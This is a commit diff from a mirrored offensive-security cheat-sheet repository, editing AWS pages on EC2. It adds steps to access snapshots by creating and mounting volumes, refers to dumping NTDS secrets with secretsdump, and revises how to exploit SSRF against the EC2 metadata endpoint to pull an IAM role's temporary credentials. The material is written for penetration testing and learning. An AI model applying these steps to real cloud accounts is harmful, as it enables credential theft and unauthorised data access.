swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

EC2 Snapshots

pull/19/head
Swissky 2024-09-15 22:00:29 +02:00
parent 978e8b336b
commit 255aaec399
2 changed files with 30 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
docs/cloud/aws/aws-ec2.md
View File

@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
## Access Snapshots
1. Get the `owner-id`
```powershell
$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",
```
2. List snapshots
```powershell
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",
```
3. Create a volume using the previously obtained `snapshotId`
```powershell
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
```
4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
```ps1
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt
```
## Instance Connect
Push an SSH key to EC2 instance

10
docs/cloud/aws/aws-metadata.md
View File

@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta
## Method for Elastic Cloud Compute (EC2)
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.
1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)
```powershell
ami-id
ami-launch-index
@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
instance-action
instance-id
```
2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/)
3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/](http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/)
```powershell
{
"Code" : "Success",
@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
## AWS API calls that return credentials
- chime:createapikey
- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html)
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)